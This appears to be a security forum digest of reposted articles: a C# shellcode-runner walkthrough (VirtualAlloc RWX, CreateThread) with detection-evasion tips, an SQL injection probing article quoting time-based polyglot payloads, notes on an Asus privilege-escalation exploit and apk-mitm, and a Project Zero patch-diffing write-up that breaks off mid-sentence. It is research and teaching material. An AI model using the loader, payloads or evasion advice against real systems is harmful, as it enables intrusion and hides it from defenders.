In this code, when RemoveDirectory() fails, it will print out the Win32 error code describing the failure. This code could either be parsed by the FormatMessage() function or through throw new Win32Exception(Marshal.GetLastWin32Error());. I would recommend using this functionality in your code, at least while testing/debugging, to avoid missing important error messages. Structs Many of the same concepts described above apply to structs. We simply convert the Windows datatypes to .NET datatypes. For example, the ShellExecuteInfo struct used by ShellExecute() goes from this: typedef struct ShellExecuteInfo { DWORD cbSize; ULONG fMask; HWND hwnd; LPCSTR lpVerb; LPCSTR lpFile; LPCSTR lpParameters; LPCSTR lpDirectory; int nShow; HINSTANCE hInstApp; void *lpIDList; LPCSTR lpClass; HKEY hkeyClass; DWORD dwHotKey; HANDLE hIcon; HANDLE hMonitor; HANDLE hProcess; } To this: public struct ShellExecuteInfo { public int cbSize; public uint fMask; public IntPtr hwnd; [MarshalAs(UnmanagedType.LPTStr)] public string lpVerb; [MarshalAs(UnmanagedType.LPTStr)] public string lpFile; [MarshalAs(UnmanagedType.LPTStr)] public string lpParameters; [MarshalAs(UnmanagedType.LPTStr)] public string lpDirectory; public int nShow; public IntPtr hInstApp; public IntPtr lpIDList; [MarshalAs(UnmanagedType.LPTStr)] public string lpClass; public IntPtr hkeyClass; public uint dwHotKey; public IntPtr hIcon; public IntPtr hProcess; } You will notice lines containing [MarshalAs(UnmanagedType.LPTStr)]. This is because strings copied from managed to unmanaged format are not copied back when the call returns. This line simply gives us the ability to marshal strings by explicitly stating how to. Enums Enumerators, or enums, are arguably the least headache-inducing of all of these sections. The easiest way to think about enums is by comparing them to dictionaries — they map something to something else. Here is an example enum: public enum StateEnum { MEM_COMMIT = 0x1000, MEM_RESERVE = 0x2000, MEM_FREE = 0x10000 } We could then use these mappings in our functions. For example: VirtualAlloc(0, 400 ,(uint)StateEnum.MEM_COMMIT, 0x40); Which could also be represented as: VirtualAlloc(0, 400 ,0x1000, 0x40); Practical Example Back to the original problem — running our shellcode. Using the knowledge we’ve gained, we can combine the sections into a working proof of concept. P/Invoke Declarations We start our program off by including the required namespace. using System; using System.Runtime.InteropServices; Then we declare our external functions in our class. [DllImport(“kernel32.dll”)] private static extern uint VirtualAlloc( uint lpStartAddr, uint size, uint flAllocationType, uint flProtect);[DllImport(“kernel32.dll”)] private static extern IntPtr CreateThread( uint lpThreadAttributes, uint dwStackSize, uint lpStartAddress, IntPtr param, uint dwCreationFlags, ref uint lpThreadId);[DllImport(“kernel32.dll”)] private static extern bool CloseHandle(IntPtr handle);[DllImport(“kernel32.dll”)] private static extern uint WaitForSingleObject( IntPtr hHandle, uint dwMilliseconds); Don’t forget about our enums! public enum StateEnum { MEM_COMMIT = 0x1000, MEM_RESERVE = 0x2000, MEM_FREE = 0x10000 }public enum Protection { PAGE_READONLY = 0x02, PAGE_READWRITE = 0x04, PAGE_EXECUTE = 0x10, PAGE_EXECUTE_READ = 0x20, PAGE_EXECUTE_READWRITE = 0x40, } Writing the Main() Method With all of the supporting functions defined, we start by creating a byte array containing our shellcode in the Main() method. byte[] shellcode = new byte[319] {0xfc,0xe8,…}; Using VirtualAlloc(), we allocate the required amount of memory along with values defined in our enums. IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (uint)shellcode.Length, (uint)StateEnum.MEM_COMMIT, (uint)Protection.PAGE_EXECUTE_READWRITE); Then we use Marshal.Copy() to copy our shellcode from managed memory into an unmanaged memory pointer, which is stored in the variable funcAddr. Marshal.Copy(shellcode, 0, funcAddr, shellcode.Length); Now our shellcode is written into an executable portion of memory. The last thing to do before we execute is to set up a few pieces we’ll need for the execution itself. IntPtr hThread = IntPtr.Zero; uint threadId = 0; IntPtr pinfo = IntPtr.Zero; With that out of the way, we can create a thread that will execute our payload by setting the lpStartAddress parameter to the function address of our shellcode. hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); To be a little more clean, we can use WaitForSingleObject() to wait an infinite amount of time, specified by 0xFFFFFFFF, for the thread to exit. Once it finishes, we will return void and the program will exit. WaitForSingleObject(hThread, 0xFFFFFFFF); I’ve created a public Gist in case the formatting is a little confusing. https://gist.github.com/matterpreter/6ddfbdcb9511dd6933e6d3474709c32c Closing Notes While this example shows a common use case for P/Invoke, you are only limited in your imagination when it comes to other uses. For example, in the mock directory UAC bypass, I had to use the unmanaged CreateDirectory() function to create C:\Windows \ because the managed System.IO.Directory.CreateDirectory function could not handle the space at the end of the directory name. Using P/Invoke was one way to get this technique to work in .NET and is especially common for the Win32 API calls that use null-terminated strings versus Native API call that use counted Unicode strings. One of the OPSEC concerns to keep in mind when using P/Invoke is suspicious imports. Because imported DLLs are a simple piece of data to collect for defenders, importing something odd or out of place could tip off anyone investigating your assembly. One method of evasion is to dynamically invoke unmanaged code. An example of this was recently added to SharpSploit by @TheRealWover. Posts By SpecterOps Team Members Posts from SpecterOps team members on various topics… Follow Sursa: https://posts.specterops.io/offensive-p-invoke-leveraging-the-win32-api-from-managed-code-7eef4fdef16d
-
Same Same But Different: Discovering SQL Injections Incrementally with Isomorphic SQL Statements April 5, 2020 Motivation Despite the increased adoption of Object-Relational Mapping (ORM) libraries and prepared SQL statements, SQL injections continue to turn up in modern applications. Even ORM libraries have introduced SQL injections due to mistakes in translating object mappings to raw SQL statements. Of course, legacy applications and dangerous development practices also contribute to SQL injection vulnerabilities. Initially, I faced difficulties identifying SQL injections. Unlike another common vulnerability class, Cross-Site Scripting (XSS), endpoints vulnerable to SQL injections usually don't provide feedback on where and how you're injecting into the SQL statement. For XSS, it's simple: with the exception of Blind XSS (where the XSS ends up in an admin panel or somewhere you don't have access to), you always see where your payload ends up in the HTML response. For SQL injections, the best case scenario is that you get a verbose stack trace that tells you exactly what you need: HTTP/1.1 500 Internal Server Error Content-Type: text/html; charset=utf-8 <div id="error"> <h1>Database Error</h1> <div class='message'> SQL syntax error near '''' where id=123' at line 1: update common_member SET name=''' where id=123 </div> </div> If you see this, it's your lucky day. More often, however, you will either get a generic error message, or worse, no error at all – only an empty response. HTTP/1.1 200 OK Content-Type: application/json { "users": [] } As such, hunting SQL injections can be arduous and time-consuming. Many researchers prefer to do a single pass with automated tools like sqlmap and call it a day. However, running these tools without specific configurations is a blunt instrument that is easily detected and blocked by Web Application Firewalls (WAF). Furthermore, SQL injections occur in unique contexts; you might be injecting after a WHERE or LIKE or ORDER BY and each context requires a different kind of injection. This is even before various sanitization steps are applied. Polyglots help researchers use a more targeted approach. However, polyglots, by their very definition, try to execute in multiple contexts at once, often sacrificing stealth and succinctness. Take for example the SQLi Polyglots from Seclists: SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/ SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/ IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/ Any half-decent WAF would pick up on these payloads and block them. In real-world scenarios, researchers need to balance two concerns when searching for SQL injections: Ability to execute and thus identify injections in multiple contexts Ability to bypass WAFs and sanitization steps A researcher can resolve this efficiently with something I call Isomorphic SQL Statements (although I'm sure other researchers have different names for it). Incremental Approaches to Discovering Vulnerabilities Going back to the XSS analogy, while XSS scanners and fuzzing lists are a dime a dozen, they usually don't work too well due to the above mentioned WAF blocking and unique contexts. Recently, more advanced approaches to automated vulnerability discovery have emerged which try to address the downsides of bruteforce scanning, like James Kettle's Backslash Powered Scanning. As Kettle writes, Rather than scanning for vulnerabilities, we need to scan for interesting behaviour. In turn, automation pipeline tools like Ameen Mali's qsfuzz and Project Discovery's nuclei test against defined heuristic rules (“interesting behaviour”) rather than blindly bruteforcing payloads. This is the path forward for large-scale vulnerability scanning as more organizations adopt WAFs and better development practices. For example, when testing for an XSS, instead of asking “does an alert box pop when I put in this payload?”, I prefer to ask “does this application sanitize single quotes? How about angle brackets?” The plus side of this is that you can easily automate this on a large scale without triggering all but the most sensitive WAFs. You can then follow up with manual exploitation for each unique context. The same goes for SQL injections. But how do you formulate your tests without any feedback mechanisms? Remember that SQL injections differ from XSS in that usually no (positive) response is given. Nevertheless, one thing I've learned from researchers like Ian Bouchard is that even no news is good news. This is where Isomorphic SQL Statements come into play. Applied here, isomorphic simply means SQL statements that are written differently but theoretically should return the same output. However, the difference is that you will be testing SQL statements which include special characters like ' or -. If the characters are properly escaped, the injected SQL statement will fail to evaluate to the same result as the original. If they aren't properly escaped, you'll get the same result, which indicates an SQL injection is possible. Let's illustrate this with a simple toy SQL injection: CREATE TABLE Users ( ID int key auto_increment, LastName varchar(255), FirstName varchar(255), Address varchar(255), City varchar(255) ); INSERT INTO Users (LastName, FirstName, Address, City) VALUES ('Bird', 'Big', '123 Sesame Street', 'New York City'); INSERT INTO Users (LastName, FirstName, Address, City) VALUES ('Monster', 'Cookie', '123 Sesame Street', 'New York City'); SELECT FirstName FROM Users WHERE ID = <USER INPUT>; If you are fuzzing with a large list of SQL polyglots, it would be relatively trivial to pick up the injection, but in reality the picture will be complicated by WAFs, sanitization, and more complex statements. Next, consider the following statements: SELECT FirstName FROM Users WHERE ID = 1; SELECT FirstName FROM Users WHERE ID = 2-1; SELECT FirstName FROM Users WHERE ID = 1+''; They should all evaluate to the same result if the special characters in the last two statements are injected unsanitized. If they don't evaluate to the same results, the server is sanitizing them in some way. Now consider a common version of a search query, SELECT Address FROM Users WHERE FirstName LIKE '%<USER INPUT>%' ORDER BY Address DESC;: SELECT Address FROM Users WHERE FirstName LIKE '%Big%' ORDER BY Address DESC; SELECT Address FROM Users WHERE FirstName LIKE '%Big%%%' ORDER BY Address DESC; SELECT Address FROM Users WHERE FirstName LIKE '%Big%' '' ORDER BY Address DESC; Simply by injecting the same special character % twice in the second statement, we are given a clue about the actual SQL statement you are injecting into (it's after a LIKE operator) if you receive the same response back. Even better, as Arne Swinnen noted way back in 2013 (a pioneer!): Strings: split a valid parameter’s string value in two parts, and add an SQL string concat directive in between. An identical response for both requests would again give you reason to believe you have just hit an SQL injection. We can achieve the same isomorphic effect for strings as numeric IDs simply by adding ' ' to our injection in the third statement. This is interpreted as concatenating the original string with a blank string, which should also return the same response while indicating that ' isn't being properly escaped. From here, it is a simple matter of experimenting incrementally. You thus achieve two objectives: Discover which injectable characters are entered unsanitized into the final SQL statement Discover the original SQL statement you are injecting into Mass Automation and Caveats The goal of this is not only to discover individual SQL injections, but to be able to automate and apply this across large numbers of URLs and inputs. Traditional SQL injection payload lists or scanners make large-scale scanning noisy and resource-intensive. With the incremental isomorphic approach, you apply a heuristic rule like: if (response of id_input) === (response of id_input + "+''"): return true else: return false This is much lighter and faster. Of course, while you gain in terms of fewer false negatives (e.g. polyglots that work but are blocked by WAFs), you lose in terms of more false positives. For example, there are cases where the backend simply trims all non-numeric characters before entering an SQL statement, in which case the above isomorphic statement would still succeed. Thus, rather than relying on a single isomorphic statement (binary signal), you will want to watch for multiple isomorphic statements succeeding (spectrum signal). Although SQL injections are getting rarer, I've still come across them occasionally in manual tests. A mass scanning approach will yield even better results. Sursa: https://spaceraccoon.dev/same-same-but-different-discovering-sql-injections-incrementally-with
-
For more content like this, subscribe to this channel, and join our community at https://aka.ms/SecurityCommunity.
-
In this video we'll take a look at unpacking a trojan with Ghidra, x64dbg and Scylla. You'll also see how some anti-analysis tricks can affect the disassembly/decompiler output and ways to get around it. And finally, use x64dbg and Scylla to dump and fix the unpacked executable. You can find the original executable along with the shellcode and dumped samples on my Github: https://github.com/jstrosch/malware-s...
-
Asus AsIO2 LPE exploit, based on rewolf-msi-exploit Blog posts: Research: https://syscall.eu/blog/2020/03/30/asus_gio/ Exploitation: http://syscall.eu/blog/2020/04/04/asus_gio_exploit/ This exploit is an extension of ReWolf's exploit More info can be found here: http://blog.rewolf.pl/blog/?p=1630 Fork notes by Raphaël Rigo patched the C++ code to support compilation with MinGW added a Makefile added a provider for AsIO2 added EPROCESS Token offset for recent Windows versions Compilation under Linux Install MinGW64: apt install mingw-w64 run make in MsiExploit folder Compilation under Windows install python, make sure it's in your path pip install cryptodome run nmake -f Makefile.nmake in MsiExploit folder Sursa: https://github.com/trou/asus-asio2-lpe-exploit
-
REPLICA TAME THE DRAGON ✨Features ⚡ Disassemble missed instructions - Define code that Ghidra's auto analysis missed ⚡ Detect and fix missed functions - Define functions that Ghidra's auto analysis missed ⚡ Fix 'undefinedN' datatypes - Enhance Disassembly and Decompilation by fixing 'undefinedN' DataTypes ⚡ Set MSDN API info as comments - Integrate information about functions, arguments and return values into Ghidra's disassembly listing in the form of comments ⚡ Tag Functions based on API calls - rename functions that calls one or more APIs with the API name and API type family if available ⚡ Detect and mark wrapper functions - Rename wrapper functions with the wrapping level and wrapped function name ⚡ Fix undefined data and strings - Defines ASCII strings that Ghidra's auto analysis missed and Converts undefined bytes in the data segment into DWORDs/QWORDs ⚡ Detect and label crypto constants - Searche and label constants known to be associated with cryptographic algorithm in the code ⚡ Detect and comment stack strings - Find and post-comment stack strings ⚡ Detect and label indirect string references - find and label references to existing strings ⚡ Detect and label indirect function calls - find and label references to existing functions ⚡ Rename Functions Based on string references - rename functions that references one or more strings with the function name followed by the string name. ⚡ Bookmark String Hints - Bookmark intersting strings (file extensions, browser agents, registry keys, etc..) 🚀 Installation: Copy the repository files into any of ghidra_scripts directories and extract db.7z, directories can be found from Window->Script Manager->Script Directories Search for replica and enable in tool option Done! 🔒 License Licensed under GNU General Public License v3.0 ⛏️ BUG? OPEN NEW ISSUE OPEN NEW ISSUE Sursa: https://github.com/reb311ion/replica
-
apk-mitm A CLI application that automatically prepares Android APK files for HTTPS inspection Inspecting a mobile app's HTTPS traffic using a proxy is probably the easiest way to figure out how it works. However, with the Network Security Configuration introduced in Android 7 and app developers trying to prevent MITM attacks using certificate pinning, getting an app to work with an HTTPS proxy has become quite tedious. apk-mitm automates the entire process. All you have to do is give it an APK file and apk-mitm will: decode the APK file using Apktool modify the app's AndroidManifest.xml to make it debuggable modify the app's Network Security Configuration to allow user-added certificates insert return-void opcodes to disable certificate pinning logic encode the patched APK file using Apktool sign the patched APK file using uber-apk-signer You can also use apk-mitm to patch apps using Android App Bundle and rooting your phone is not required. Usage If you have an up-to-date version of Node.js (8.2+) and Java (8+), you can run this command to patch an app: $ npx apk-mitm <path-to-apk> So, if your APK file is called example.apk, you'd run: $ npx apk-mitm example.apk ✔ Decoding APK file ✔ Modifying app manifest ✔ Modifying network security config ✔ Disabling certificate pinning ✔ Encoding patched APK file ✔ Signing patched APK file Done! Patched APK: ./example-patched.apk You can now install the example-patched.apk file on your Android device and use a proxy like Charles or mitmproxy to look at the app's traffic. Patching App Bundles You can also patch apps using Android App Bundle with apk-mitm by providing it with a *.xapk file (for example from APKPure) or a *.apks file (which you can export yourself using SAI). Making manual changes Sometimes you'll need to make manual changes to an app in order to get it to work. In these cases the --wait option is what you need. Enabling it will make apk-mitm wait before re-econding the app, allowing you to make changes to the files in the temporary directory. Caveats If the app uses Google Maps and the map is broken after patching, then the app's API key is probably restricted to the developer's certificate. You'll have to create your own API key without restrictions and run apk-mitm with the --wait option to be able to replace the com.google.android.geo.API_KEY value in the app's AndroidManifest.xml file. If apk-mitm crashes while decoding or encoding the issue is probably related to Apktool. Check their issues on GitHub to find possible workarounds. If you happen to find an Apktool version that's not affected by the issue, you can instruct apk-mitm to use it by specifying the path of its JAR file through the --apktool option. Installation The above example used npx to download and execute apk-mitm without local installation. If you do want to fully install it, you can do that by running: $ npm install -g apk-mitm Thanks Connor Tumbleson for making an awesome APK decompiler Patrick Favre-Bulle for making a very simple tool for signing APKs License MIT © Niklas Higi Sursa: https://github.com/shroudedcode/apk-mitm
-
Linux Kernel 5.3 solves the CR0 write exploit by making that register read only. Today let's discuss how we can write to the SyscallTable directly and not rely on the CR0 write exploit that we have been using. I heard about this method some time ago and I thought it had long been patched and wouldn't work . However as Nasm points out the ptr exploit still works and still has application. https://en.wikipedia.org/wiki/Control... https://outflux.net/blog/archives/201... From the site above: x86 CR4 & CR0 pinning In recent exploits, one of the steps for making the attacker’s life easier is to disable CPU protections like Supervisor Mode Access (and Execute) Prevention (SMAP and SMEP) by finding a way to write to CPU control registers to disable these features. For example, CR4 controls SMAP and SMEP, where disabling those would let an attacker access and execute userspace memory from kernel code again, opening up the attack to much greater flexibility. CR0 controls Write Protect (WP), which when disabled would allow an attacker to write to read-only memory like the kernel code itself. Attacks have been using the kernel’s CR4 and CR0 writing functions to make these changes (since it’s easier to gain that level of execute control), but now the kernel will attempt to “pin” sensitive bits in CR4 and CR0 to avoid them getting disabled. This forces attacks to do more work to enact such register changes going forward. (I’d like to see KVM enforce this too, which would actually protect guest kernels from all attempts to change protected register bits.)
-
Thursday, April 2, 2020 TFW you-get-really-excited-you-patch-diffed-a-0day-used-in-the-wild-but-then-find-out-it-is-the-wrong-vuln Posted by Maddie Stone, Project Zero INTRODUCTION I’m really interested in 0-days exploited in the wild and what we, the security community, can learn about them to make 0-day hard. I explained some of Project Zero’s ideas and goals around in-the-wild 0-days in a November blog post. On December’s Patch Tuesday, I was immediately intrigued by CVE-2019-1458, a Win32k Escalation of Privilege (EoP), said to be exploited in the wild and discovered by Anton Ivanov and Alexey Kulaev of Kaspersky Lab. Later that day, Kaspersky published a blog post on the exploit. The blog post included details about the exploit, but only included partial details on the vulnerability. My end goal was to do variant analysis on the vulnerability, but without full and accurate details about the vulnerability, I needed to do a root cause analysis first. I tried to get my hands on the exploit sample, but I wasn't able to source a copy. Without the exploit, I had to use binary patch diffing in order to complete root cause analysis. Patch diffing is an often overlooked part of the perpetual vulnerability disclosure debate, as vulnerabilities become public knowledge as soon as a software update is released, not when they are announced in release notes. Skilled researchers can quickly determine the vulnerability that was fixed by comparing changes in the codebase between old and new versions. If the vulnerability is not publicly disclosed before or at the same time that the patch is released, then this could mean that the researchers who undertake the patch diffing effort could have more information than the defenders deploying the patches. While my patch diffing adventure did not turn out with me analyzing the bug I intended (more on that to come!), I do think my experience can provide us in the community with a data point. It’s rarely possible to reference hard timelines for how quickly sophisticated individuals can do this type of patch-diffing work, so we can use this as a test. I acknowledge that I have significant experience in reverse engineering, however I had no previous experience at all doing research on a Windows platform, and no knowledge of how the operating system worked. It took me three work weeks from setting up my first VM to having a working crash proof-of-concept for a vulnerability. This can be used as a data point (likely a high upper bound) for the amount of time it takes for individuals to understand a vulnerability via patch diffing and to create a working proof-of-concept crasher, since most individuals will have prior experience with Windows. But as I alluded to above, it turns out I analyzed and wrote a crash POC for not CVE-2019-1458, but actually CVE-2019-1433. I wrote this whole blog post back in January, went through internal reviews, then sent the blog post to Microsoft to preview (we provide vendors with 24 hour previews of blog posts). That’s when I learned I’d analyzed CVE-2019-1433, not CVE-2019-1458. At the beginning of March, Piotr Florczyk published a detailed root cause analysis and POC for the “real” CVE-2019-1458 bug. With the “real” root cause analysis for CVE-2019-1458 now available, I decided that maybe this blog post could still be helpful to share what my process was to analyze Windows for the first time and where I went wrong. This blog post will share my attempt to complete a root cause analysis of CVE-2019-1458 through binary patch diffing, from the perspective of someone doing research on Windows for the first time. This includes the process I used, a technical description of the “wrong”, but still quite interesting bug I analyzed, and some thoughts on what I learned through this work, such as where I went wrong. This includes the root cause analysis for CVE-2019-1433, that I originally thought was the vulnerability for the in the wild exploit. As far as I know, the vulnerability detailed in this blog post was not exploited in the wild. MY PROCESS When the vulnerability was disclosed on December’s Patch Tuesday, I was immediately interested in the vulnerability. As a part of my new role on Project Zero where I’m leading efforts to study 0-days used in the wild, I was really interested in learning Windows. I had never done research on a Windows platform and didn’t know anything about Windows programming or the kernel. This vulnerability seemed like a great opportunity to start since: Complete details about the specific vulnerability weren't available, It affected both Windows 7 and Windows 10, and The vulnerability is in win32k which is a core component of the Windows kernel. I spent a few days trying to get a copy of the exploit, but wasn’t able to. Therefore I decided that binary patch-diffing would be my best option for figuring out the vulnerability. I was very intrigued by this vulnerability because it affected Windows 10 in addition to Windows 7. However, James Forshaw advised me to patch diff the Windows 7 win32k.sys files rather than the Windows 10 versions. He suggested this for a few reasons: The signal to noise ratio is going to be much higher for Windows 7 rather than Windows 10. This “noise” includes things like Control Flow Guard, more inline instrumentation calls, and “weirder” compiler settings. On Windows 10, win32k is broken up into a few different files: win32k.sys, win32kfull.sys, win32kbase.sys, rather than a single monolithic file. Kaspersky’s blog post stated that not all Windows 10 builds were affected. I got to work creating a Windows 7 testing environment. I created a Windows 7 SP1 x64 VM and then started the long process of patching it up until September 2019 (the last available update prior to the December 2019 update where the vulnerability was supposedly fixed). This took about a day and a half as I worked to find the right order to apply the different updates. Turns out that me thinking that September 2019 was the last available update prior to December 2019 would be one of the biggest reasons that I patch-diffed the wrong bug. I thought that September 2019 was the latest because it was the only update shown to me, besides December 2019, when I clicked “Check for Updates” within the VM. Because I was new to Windows, I didn’t realize that not all updates may be listed in the Windows Update window or that updates could also be downloaded from the Microsoft Update Catalog. When Microsoft told me that I had analyzed the wrong vulnerability, that’s when I realized my mistake. CVE-2019-1433, the vulnerability I analyzed, was patched in November 2019, not December 2019. If I had patch-diffed November to December, rather than September to December, I wouldn’t have gotten mixed up. Once the Windows 7 VM had been updated to Sept 2019, I made a copy of its C:\Windows\System32\win32k.sys file and snapshotted the VM. I then updated it to the most recent patch, December 2019, where the vulnerability in question was fixed. I then snapshotted the VM again and saved off the copy of win32k.sys. These two copies of win32k.sys are the two files I diffed in my patch diffing analysis. Win32k is a core kernel driver that is responsible for the windows that are shown as a part of the GUI. In later versions of Windows, it’s broken up into multiple files rather than the single file that it is on Windows 7. Having only previously worked on the Linux/Android and RTOS kernels, the GUI aspects took a little bit of time to wrap my head around. On James Foreshaw’s recommendation, I cloned my VM so that one VM would run WinDbg and debug the other VM. This allows for kernel debugging. Now that I had a copy of the supposed patched and supposed vulnerable versions of win32k.sys, it’s time to start patch diffing. PATCH DIFFING WINDOWS 7 WIN32K.SYS I decided to use BinDiff to patch diff the two versions of win32k. In October 2019, I did a comparison on the different binary diffing tools available [video, slides], and for me, BinDiff worked best “out of the box” so I decided to at least start with that again. I loaded both files into IDA and then ran BinDiff between the two versions of win32k. To my pleasant surprise, there were only 23 functions total in the whole file/driver that had changed from one version to another. In addition, there were only two new functions added in the December 2019 file that didn’t exist in September. This felt like a good sign: 23 functions seemed like even in the worst case, I could look at all of them to try and find the patched vulnerability. (Between the November and December 2019 updates only 5 functions had changed, which suggests the diffing process could have been even faster.) Original BinDiff Matched Functions of win32k.sys without Symbols When I started the diff, I didn’t realize that the Microsoft Symbol Server was a thing that existed. I learned about the Symbol Server and was told that I could easily get the symbols for a file by running the following command in WinDbg: x win32k!*. I still hadn’t realized that IDA Pro had the capability to automatically get the symbols for you from a PDB file, even if you aren’t running IDA on a Windows computer. So after running the WinDBG command, I copied all of the output to a file, rebased my IDA Pro databases to the same base address and then would manually rename functions as I was reversing based on the symbols and addresses in the text file. About a week into this escapade, I learned how to modify the IDA configuration file to have my IDA Pro instance, running on Linux, connect to my Windows VM to get the symbols. BinDiff Matched Function of win32k.sys with Symbols What stood out at first when I looked at BinDiff was that none of the functions called out in Kaspersky’s blog post had been changed: not DrawSwitchWndHilite, CreateBitmap, SetBitmapBits, nor NtUserMessageCall. Since I didn’t have a strong indicator for a starting point, I instead tried to rule out functions that likely wouldn’t be the change that I was looking for. I first searched for function names to determine if they were a part of a different blog post or CVE. Then I looked through all of the CVEs claimed to affect Windows 7 that were fixed in the December Bulletin and matched them up. Through this I ruled out the following functions: CreateSurfacePal - CVE-2019-1362 RFONTOBJ::bInsterGlyphbitsLookaside, xInsertGlyphbitsRFONTOBJ - CVE-2019-1468 EXPLORING THE WRONG CHANGES At this point I started scanning through functions to try and understand their purpose and look at the changes that were made. GreGetStringBitmapW caught my eye because it had “bitmap” in the name and Kaspersky’s blog post talked about the use of bitmaps. The changes to GreGetStringBitmapW didn’t raise any flags: one of the changes had no functional impact and the other was sending arguments to another function, a function that was also listed as having changed in this update. This function had no public symbols available and is labeled as vuln_sub_FFFFF9600028F200 in the Bindiff image above. In the Dec 2019 win32k.sys its offset from base address is 0x22F200. As shown by the BinDiff flow graph above, there is a new block of code added in the Dec 2019 version of win32k.sys. The Dec 2019 added argument checking before using that argument when calculating where to write to a buffer. This made me think that this was a vulnerability in contention: it’s called from a function with bitmap in the name and appears that there would be a way to overrun a buffer. I decided to keep reversing and spent a few days on this change. I was getting deep down in the rabbit hole though and had to remember that the only tie I had between this function and the details known about the in-the-wild exploit was that “bitmap” was in the name. I needed to determine if this function was even called during the calls mentioned in the Kaspersky blog post. I followed cross-references to determine how this function could be called. The Nt prefix on function names means that the function is a syscall. The Gdi in NtGdiGetStringBitmapW means that the user-mode call is in gdi32.dll. Mateusz Jurczyk provides a table of Windows syscalls here. Therefore, the only way to trigger this function is through a syscall to NtGdiGetStringBitmapW. In gdi32.dll, the only call to NtGdiGetStringBitmapW is GetStringBitmapA, which is exported. Tracing this call path and realizing that none of the functions mentioned in the Kaspersky blog post called this function made me realize that it was pretty unlikely that this was the vulnerability. However, I decided to dynamically double check that this function wouldn’t be called when calling the functions listed in the blog post or trigger the task switch window. I downloaded Visual Studio into my Windows 7 VM and wrote my first Windows Desktop app, following this guide. Once I had a working “Hello, World”, I began to add calls to the functions that are mentioned in the Kaspersky blog post: Creating the “Switch” window, CreateBitmap, SetBitmapBits, NtUserMessageCall, and half-manually/half-programmatically trigger the task-switch window, etc. I set a kernel breakpoint in Windbg on the function of interest and then ran all of these. The function was never triggered, confirming that it was very unlikely this was the vulnerability of interest. I then moved on to GreAnimatePalette. When you trigger the task switch window, it draws a new window onto the screen and moves the “highlight” to the different windows each time you press tab. I thought that, “Sure, that could involve animating a palette”, but I learned from last time and started with trying to trigger the call in WinDbg instead. I found that it was never called in the methods that I was looking at so I didn’t spend too long and moved on. NARROWING IT DOWN TO xxxNextWindow and xxxKeyEvent After these couple of false starts, I decided to change my process. Instead of starting with the functions in the diff, I decided to start at the function named in Kaspersky’s blog: DrawSwitchWndHilite. I searched the cross-references graph to DrawSwitchWndHilite for any functions listed in the diff as having been changed. As shown in the call graph above, xxxNextWindow is two calls above DrawSwitchWndHilite. When I looked at xxxNextWindow, I then saw that xxxNextWindow is only called by xxxKeyEvent and all of the changes in xxxKeyEvent surrounded the call to xxxNextWindow. These appeared to be the only functions in the diff that lead to a call to DrawSwitchWndHilite so I started reversing to understand the changes. REVERSING THE VULNERABILITY I had gotten symbols for the function names in my IDA databases, but for the vast majority of functions, this didn’t include type information. To begin finding type information, I started googling for different function names or variable names. While it didn’t have everything, ReactOS was one of the best resources for finding type information, and most of the structures were already in IDA. For example, when looking at xxxKeyEvent, I saw that in one case, the first argument to xxxNextWindow is gpqForeground. When I googled for gpqForeground, ReactOS showed me that this variable has type tagQ *. Through this, I also realized that Windows uses a convention for naming variables where the type is abbreviated at the beginning of the name. For example: gpqForeground → global, pointer to queue (tagQ *), gptiCurrent → global, pointer to thread info (tagTHREADINFO *). This was important for the modification to xxxNextWindow. There was a single line change between September and December to xxxNextWindow. The change checked a single bit in the structure pointed to by arg1. If that bit is set, the function will exit in the December version. If it’s not set, then the function proceeds, using arg1. Once I knew that the type of the first argument was tagQ *, I used WinDbg and/or IDA to see its structure. The command in WinDbg is dt win32k!tagQ. At this point, I was pretty sure I had found the vulnerability (😉), but I needed to prove it. This involved about a week more of reversing, reading, debugging, wanting to throw my computer out the window, and getting intrigued by potential vulnerabilities that were not this vulnerability. As a side note, for the reversing, I found that the HexRays decompiler was great for general triage and understanding large blocks of code, but for the detailed understanding necessary (at least for me) for writing a proof-of-concept (POC), I mainly used the disassembly view. RESOURCES Here are some of the resources that were critical for me: “Kernel Attacks Through User- Mode Callbacks” Blackhat USA 2011 talk by Tarjei Mandt [slides, video] I learned about thread locking, assignment locking, and user-mode callbacks. “One Bit To Rule A System: Analyzing CVE-2016-7255 Exploit In The Wild” by Jack Tang, Trend Micro Security Intelligence [blog] This was an analysis of a vulnerability also related to xxxNextWindow. This blog helped me ultimately figure out how to trigger xxxNextWindow and some argument types of other functions. “Kernel exploitation – r0 to r3 transitions via KeUserModeCallback” by Mateusz Jurczyk [blog] This blog helped me figure out how to modify the dispatch table pointer with my own function so that I could execute during the user-mode callback. “Windows Kernel Reference Count Vulnerabilities - Case Study” by Mateusz Jurczyk, Zero Nights 2012 [slides] “Analyzing local privilege escalations in win32k” by mxatone, Uninformed v10 (10/2008) [article] P0 Team Members: James Forshaw, Tavis Ormandy, Mateusz Jurczyk, and Ben Hawkes TIMELINE Oct 31 2019: Chrome releases fix for CVE-2019-13720 Dec 10 2019: Microsoft Security Bulletin lists CVE-2019-1458 as exploited in the wild and fixed in the December updates. Dec 10-16 2019: I ask around for a copy of the exploit. No luck! Dec 16 2019: I begin setting up a Windows 7 kernel debugging environment. (And 2 days work on a different project.) Dec 23 2019: VM is set-up. Start patch diffing Dec 24-Jan 2: Holiday Jan 2 - Jan 3: Look at other diffs that weren’t the vulnerability. Try to trigger DrawSwitchWndHilite Jan 6: Realize changes to xxxKeyEvent and xxxNextWindow is the correct change. (Note dear reader, this is not in fact the “correct change”.) Jan 6-Jan16: Figure out how the vulnerability works, go down random rabbit holes, work on POC. Jan 16: Crash POC crashes! Approximately 3 work weeks to set up a test environment, diff patches, and create crash POC. CVE-2019-1458 CVE-2019-1433 ROOT CAUSE ANALYSIS Bug class: use-after-free OVERVIEW The vulnerability is a use-after-free of a tagQ object in xxxNextWindow, freed during a user mode callback. (The xxx prefix on xxxNextWindow means that there is a callback to user-mode.) The function xxxKeyEvent is the only function that calls xxxNextWindow and it calls xxxNextWindow with a pointer to a tagQ object as the first argument. Neither xxxKeyEvent nor 